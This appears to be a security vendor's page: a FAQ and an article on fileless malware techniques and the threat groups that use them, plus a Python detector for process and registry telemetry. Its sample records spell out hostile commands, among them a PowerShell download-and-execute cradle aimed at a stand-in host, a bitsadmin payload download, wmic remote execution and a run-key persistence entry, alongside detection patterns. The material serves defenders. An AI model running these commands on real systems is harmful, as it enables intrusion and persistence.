Frequently Asked Questions

Fileless Malware Attacks & Detection

What is a fileless malware attack?

Fileless malware attacks are cyberattacks that use legitimate system tools and in-memory execution techniques to perform malicious actions without dropping files to disk. This makes them notoriously difficult to detect, as they do not leave traditional file-based signatures and often evade legacy antivirus solutions. (Source: Cymulate Blog)

How do fileless attacks differ from traditional malware?

Unlike traditional malware, which is dropped to disk and executed from the hard drive, fileless attacks operate directly from system memory. This allows them to bypass signature-based antivirus solutions and makes detection much more challenging. (Source: Cymulate Blog)

Why are fileless malware attacks so difficult to detect?

Fileless malware attacks are difficult to detect because they use legitimate system tools and execute in memory, leaving no files on disk for traditional antivirus solutions to scan. Even advanced EDR solutions can be evaded by sophisticated attackers. (Source: Cymulate Blog)

What are some common tools and techniques used in fileless attacks?

Common tools and techniques include PowerShell, BITSadmin, MSBuild.exe, Windows Management Instrumentation (WMI), and Runonce registry keys. These are legitimate Windows utilities that attackers abuse to download payloads, move laterally, escalate privileges, and maintain persistence. (Source: Cymulate Blog)

Which threat groups are known for using fileless attack techniques?

Threat groups such as Leviathan, Tropic Trooper, APT3, MenuPass, Threat Group 3390, SoftCell, DragonOK, Deep Panda, APT41, APT29, OilRig, Lazarus Group, FIN6, and others have been observed using fileless attack techniques. (Source: Cymulate Blog)

How prevalent are fileless malware attacks?

Fileless malware attacks increased by 265% in 2019, highlighting their growing prevalence and the need for advanced detection and prevention strategies. (Source: Infosecurity Magazine)

What is the role of PowerShell in fileless attacks?

PowerShell is commonly used by attackers to download and execute payloads, install backdoors, move laterally, escalate privileges, and conduct reconnaissance. Virtually every APT group leverages PowerShell in their attack chains. (Source: Cymulate Blog)

How is BITSadmin abused in fileless attacks?

BITSadmin, a Windows Background Intelligent Transfer Service tool, is abused by attackers to download, execute, and clean up malicious code. It is used for data exfiltration, downloading backdoors, and maintaining persistence. (Source: Cymulate Blog)

What is the significance of MSBuild.exe in fileless attacks?

MSBuild.exe is a signed Microsoft binary used by attackers to bypass application whitelisting and execute arbitrary code. It is commonly used in attacks involving the Empire framework and PlugX RAT, and is favored by several APT groups. (Source: Cymulate Blog)

How do attackers use WMI in fileless attacks?

Windows Management Instrumentation (WMI) is used by attackers to bypass user account control, dump credentials, obfuscate data, disable security tools, copy files remotely, and enable lateral movement. WMI has been used in ransomware attacks like Olympic Destroyer, RobbinHood, NotPetya, and WannaCry. (Source: Cymulate Blog)

What is the Runonce technique in fileless attacks?

The Runonce technique involves abusing Windows Registry keys to establish persistence and execute malware under the user's context. Attackers add entries to 'run keys' or the startup folder, often masquerading as legitimate programs. (Source: Cymulate Blog)

How does Cymulate help organizations defend against fileless attacks?

Cymulate simulates fileless attacks using legitimate tools to run malicious commands, providing results tagged to the MITRE ATT&CK Framework. The platform offers actionable guidance on mitigation, detection, and analysis to help organizations strengthen their defenses. (Source: Cymulate Blog)

Where can I learn more about the MITRE ATT&CK Framework?

You can find additional details about fileless attack techniques and threat groups in the MITRE ATT&CK Framework section on Cymulate's website.

How does Cymulate Exposure Validation support security testing?

Cymulate Exposure Validation makes advanced security testing fast and easy, allowing users to build custom attack chains and validate their defenses against real-world threats in a single platform. (Source: Exposure Validation Data Sheet)

What customer feedback is available about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive and user-friendly platform. For example, Raphael Ferreira, Cybersecurity Manager, stated, "Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture." (Source: Customer Quotes)

How quickly can Cymulate be implemented?

Cymulate is designed for rapid deployment, operating in agentless mode with no need for additional hardware or complex configurations. Customers can start running simulations almost immediately after deployment. (Source: Knowledge Base)

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a detailed quote, you can schedule a demo with Cymulate's team. (Source: Knowledge Base)

What security certifications does Cymulate hold?

Cymulate holds several industry-leading certifications, including SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to robust security and compliance standards. (Source: Security at Cymulate)

How does Cymulate ensure data security and privacy?

Cymulate ensures data security through encryption for data in transit (TLS 1.2+) and at rest (AES-256), secure AWS-hosted data centers, a tested disaster recovery plan, and compliance with GDPR. The platform also features mandatory 2FA, RBAC, and IP address restrictions. (Source: Security at Cymulate)

What integrations does Cymulate offer?

Cymulate integrates with a wide range of security technologies, including Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, Cisco Secure Endpoint, CrowdStrike Falcon, Wiz, SentinelOne, and more. For a complete list, visit the Partnerships and Integrations page. (Source: Knowledge Base)

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams in organizations of all sizes and industries, including finance, healthcare, retail, media, transportation, and manufacturing. (Source: Knowledge Base)

What are the key features of Cymulate's platform?

Key features include continuous threat validation, unified platform for BAS, CART, and exposure analytics, attack path discovery, automated mitigation, AI-powered optimization, complete kill chain coverage, ease of use, and an extensive threat library with over 100,000 attack actions. (Source: Knowledge Base)

How does Cymulate compare to other security validation platforms?

Cymulate stands out with its unified platform combining BAS, CART, and exposure analytics, continuous 24/7 threat validation, AI-powered remediation prioritization, complete kill chain coverage, ease of use, and proven customer outcomes such as a 52% reduction in critical exposures and 81% reduction in cyber risk. (Source: Knowledge Base)

What problems does Cymulate solve for security teams?

Cymulate addresses challenges such as fragmented security tools, resource constraints, unclear risk prioritization, cloud complexity, communication barriers, inadequate threat simulation, operational inefficiencies in vulnerability management, and post-breach recovery challenges. (Source: Knowledge Base)

Are there case studies showing Cymulate's effectiveness?

Yes, for example, Hertz Israel reduced cyber risk by 81% in four months using Cymulate. Additional case studies are available on the Cymulate Customers page. (Source: Knowledge Base)

How does Cymulate support different security roles?

Cymulate provides tailored solutions for CISOs (metrics and risk prioritization), SecOps teams (automation and efficiency), red teams (automated offensive testing), and vulnerability management teams (in-house validation and prioritization). (Source: Knowledge Base)

Where can I find Cymulate's blog, newsroom, and resource hub?

You can find the latest insights, research, and product information on the Cymulate Blog, Newsroom, and Resource Hub. (Source: Knowledge Base)

How can I stay updated with Cymulate's latest news and events?

Stay informed by visiting the company blog, newsroom, and events and webinars page for the latest updates, research, and live sessions. (Source: Knowledge Base)

What is Cymulate's mission and vision?

Cymulate's mission is to transform cybersecurity practices by enabling organizations to proactively validate their defenses, identify vulnerabilities, and optimize their security posture. The vision is to create a collaborative environment for lasting improvements in cybersecurity strategies. (Source: About Us)

What is Attack Path Discovery and how does Cymulate support it?

Attack Path Discovery is a feature that helps assess lateral movement, identify exposures, and improve threat resilience. Cymulate provides automated testing for lateral movement and attack path discovery. (Source: Attack Path Discovery)

What types of attack simulations does Cymulate provide?

Cymulate provides a wide range of full kill-chain attack simulations, covering threats such as ransomware, malware, APT groups, CVEs, and MITRE ATT&CK TTPs, to give organizations complete visibility into their threat exposure. (Source: Knowledge Base)

Where can I find resources on preventing lateral movement attacks?

Cymulate offers a blog post titled 'Stopping Attackers in Their Tracks,' which discusses common lateral movement attacks and prevention strategies. Read it on the Cymulate blog. (Source: Knowledge Base)


Fileless Malware Attacks: Key Operators

By: Cymulate

Last Updated: June 23, 2025


Notoriously difficult to detect, fileless malware uses system tools and in-memory execution techniques to do its damage. With fileless malware, adversaries don't have to create or install special tools to bypass defenses, conduct reconnaissance, deliver payloads, or execute malicious activity. Overall, fileless malware attacks increased 265% in 2019.

Fileless attacks have traditionally abused Windows OS tools or processes, but in December 2019 a fileless malware was detected that did not fit that pattern. Such attacks hide malicious code in the memory of legitimate applications. And unlike file-based malware that is dropped to disk and run from the hard drive, fileless attacks are executed right from system memory. This characteristic makes it impossible for legacy, signature-based antivirus solutions to detect fileless attacks and to blacklist them. Although EDR solutions are increasingly built to detect these attacks, adversaries often evade those defenses as well.

The following list is a small sample of what's in the wild. By understanding how they are used, and by whom, you can defend against them. Additional details about each can be found in the MITRE ATT&CK Framework.

PowerShell

PowerShell has been a mainstay of malware attacks for many years. Virtually every APT group uses it to download and execute payloads, install back doors and other tools, move laterally, escalate privileges, and conduct reconnaissance.

BITSadmin

The Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, file-transfer mechanism commonly used for background tasks such as updates and message delivery. Because BITS tasks are self-contained and don't require new files or registry modifications, firewalls usually permit them. Adversaries abuse BITS to download, execute, and clean up after running malicious code. BITS can be used to exfiltrate data, download backdoors and malicious payloads, download additional attack tools for lateral movement, and maintain persistence on a system.

The Leviathan cyber espionage group typically uses BITSadmin as it targets defense and government organizations, engineering firms, shipping and transportation, manufacturing, and research universities in the United States, Western Europe, and China. Tropic Trooper is another threat group that often uses BITSadmin in attacks on targets in Taiwan, the Philippines, and Hong Kong.

MSBuild.exe

Microsoft Build Engine (MSBuild.exe) is a developer utility that uses XML-formatted project files defining requirements for building various platforms and configurations. As a signed Microsoft binary, attackers use it to bypass application whitelisting defenses and insert code into XML files or execute arbitrary code. Attacks built on the Empire open-source remote administration and post-exploitation framework and the PlugX remote access tool (RAT) commonly use MSBuild.exe. Many different APT groups use this technique. Chinese threat groups such as APT3, MenuPass, Threat Group 3390, SoftCell, and others are well known, as is DragonOK—a threat group that has targeted Japanese organizations with phishing emails.

WMI

Windows Management Instrumentation (WMI) is a Windows feature that provides a uniform environment for local and remote access to Windows system components. For adversaries, it's a convenient tool for bypassing user account control, dumping credentials, obfuscating data, disabling security tools, copying files remotely, tainting shared content, enabling lateral movement, and delivering payloads. WMI has been used in many infamous ransomware attacks, such as Olympic Destroyer, RobbinHood, NotPetya, and WannaCry. Trojans such as Astaroth and Emotet use WMI to execute payloads and other files. Chinese threat groups known for abusing WMI include Soft Cell, Deep Panda, and APT41, while Russian (APT29), Iranian (OilRig), North Korean (Lazarus Group), and cybercrime groups (FIN6) also make extensive use of WMI.

Runonce

Runonce abuses Windows Registry keys created by default on Windows systems. The fileless attack technique adds entries to "run keys" in the Registry or to the startup folder, causing malicious programs to run in the context of the logged-on user with that user's permissions. Registry run key entries can reference programs directly or list them as a dependency. Adversaries use Runonce to establish persistence, execute malware, and "masquerade" Registry entries to look like they are associated with legitimate programs. APT groups from China, Russia, Southeast Asia, Pakistan, Iran, and other countries have used Runonce tactics extensively via malware variants. Well-known variants include Carbanak, Cobalt Group, Emotet, Leviathan, Machete, TrickBot, XBash, and Zeus Panda.
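Because none of the five techniques above leaves a file to scan, the practical detection surface is process-creation and registry telemetry. The following Python detector is an added example written for this article, not Cymulate's code or a MITRE artifact; it runs over a handful of constructed Sysmon-style records (Event ID 1 process creation, Event ID 13 registry value set) with invented hosts and `.invalid` URLs, and flags the command-line and run-key patterns each section describes: encoded or hidden-window PowerShell and download cradles, BITSadmin transfers from a URL (and the notify-command option that executes on completion), MSBuild launched against a project in a user-writable directory, WMI process creation via wmic (local or against a remote `/node:`), and Run/RunOnce values pointing at user-writable paths or script hosts. The tag names and the `Event` record layout are assumptions of this example.

```python
import base64
import re
from dataclasses import dataclass


# Minimal Sysmon-style record. Field names are this example's own, not Sysmon's XML schema.
@dataclass
class Event:
    event_id: int             # 1 = process creation, 13 = registry value set
    image: str = ""           # full path of the created process (EID 1)
    command_line: str = ""    # command line of the created process (EID 1)
    target_object: str = ""   # registry value path (EID 13)
    details: str = ""         # registry value data (EID 13)


USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|Users\\Public|ProgramData)\\", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b", re.I)
# powershell.exe accepts unambiguous prefixes of -EncodedCommand; -e, -ec, -en, -enc are the common ones.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
SCRIPT_HOST = re.compile(r"\b(?:powershell|wscript|cscript|mshta|rundll32)\b", re.I)
URL = re.compile(r"https?://", re.I)


def decode_encoded_command(command_line: str):
    """Return the -EncodedCommand payload decoded from base64/UTF-16LE, or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_process(image: str, command_line: str) -> list:
    """Tag a process-creation record with the fileless-technique patterns it matches."""
    exe = image.rsplit("\\", 1)[-1].lower()
    tags = []
    if exe in ("powershell.exe", "pwsh.exe"):
        if ENCODED_ARG.search(command_line):
            tags.append("powershell_encoded")
        if re.search(r"-w(?:indowstyle)?\s+hidden", command_line, re.I):
            tags.append("powershell_hidden_window")
        if DOWNLOAD_CRADLE.search(command_line):
            tags.append("powershell_download_cradle")
    elif exe == "bitsadmin.exe":
        if re.search(r"/(?:transfer|addfile)\b", command_line, re.I) and URL.search(command_line):
            tags.append("bits_download")
        if re.search(r"/setnotifycmdline\b", command_line, re.I):
            tags.append("bits_exec_on_complete")
    elif exe == "msbuild.exe":
        if USER_WRITABLE.search(command_line):       # project file outside a source tree
            tags.append("msbuild_project_user_writable")
    elif exe == "wmic.exe":
        if re.search(r"process\s+call\s+create", command_line, re.I):
            remote = re.search(r"/node:", command_line, re.I)
            tags.append("wmi_remote_exec" if remote else "wmi_local_exec")
    return tags


def classify_registry_set(target_object: str, details: str) -> list:
    """Flag Run/RunOnce values whose data points at user-writable paths or a script host."""
    if RUN_KEY.search(target_object) and (USER_WRITABLE.search(details) or SCRIPT_HOST.search(details)):
        return ["runkey_persistence"]
    return []


def scan(events) -> list:
    """Return (index, tags) for every record that matched at least one pattern."""
    findings = []
    for idx, ev in enumerate(events):
        if ev.event_id == 1:
            tags = classify_process(ev.image, ev.command_line)
        elif ev.event_id == 13:
            tags = classify_registry_set(ev.target_object, ev.details)
        else:
            tags = []
        if tags:
            findings.append((idx, tags))
    return findings


# Constructed sample telemetry: six records that should fire, two benign ones that should not.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    Event(1, PS, "powershell.exe -nop -w hidden -enc ZQBjAGgAbwA="),          # decodes to "echo"
    Event(1, PS, "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://updates.example.invalid/a')\""),
    Event(1, r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin.exe /transfer job1 /download /priority high http://cdn.example.invalid/p.dat C:\Users\Public\p.dat"),
    Event(1, MSB, r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.xml"),
    Event(1, r"C:\Windows\System32\wbem\WMIC.exe", 'wmic.exe /node:WS02 process call create "cmd.exe /c whoami"'),
    Event(13, target_object=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          details=r"C:\Users\alice\AppData\Roaming\Updater\updater.exe"),
    Event(1, MSB, r"MSBuild.exe C:\src\app\app.csproj /t:Build"),                     # benign build
    Event(1, PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),  # benign admin script
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        decoded = decode_encoded_command(ev.command_line) if ev.event_id == 1 else None
        print(idx, tags, ev.command_line or ev.target_object, f"decoded={decoded!r}" if decoded else "")
```

The decoder matters in practice: an EDR that only sees `-enc` has to decode the argument to know whether the script is a download cradle, so alerting on the encoded form and enriching the alert with the decoded text gives the analyst both the signal and the content. The MSBuild and run-key rules deliberately key on location rather than on the binary itself, because both are legitimate on developer and user workstations; tune `USER_WRITABLE` to your environment's build and deployment paths before using these patterns as a hunting query.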

Simulate Fileless Attacks to Boost Defenses

Cymulate simulates fileless attacks like those launched by real adversaries, using legitimate tools to run malicious commands. In each simulation, you receive results tagged to the MITRE ATT&CK Framework, where you can learn more about each threat. Cymulate goes beyond reporting to also provide you with additional guidance on mitigation, detection, and analysis.
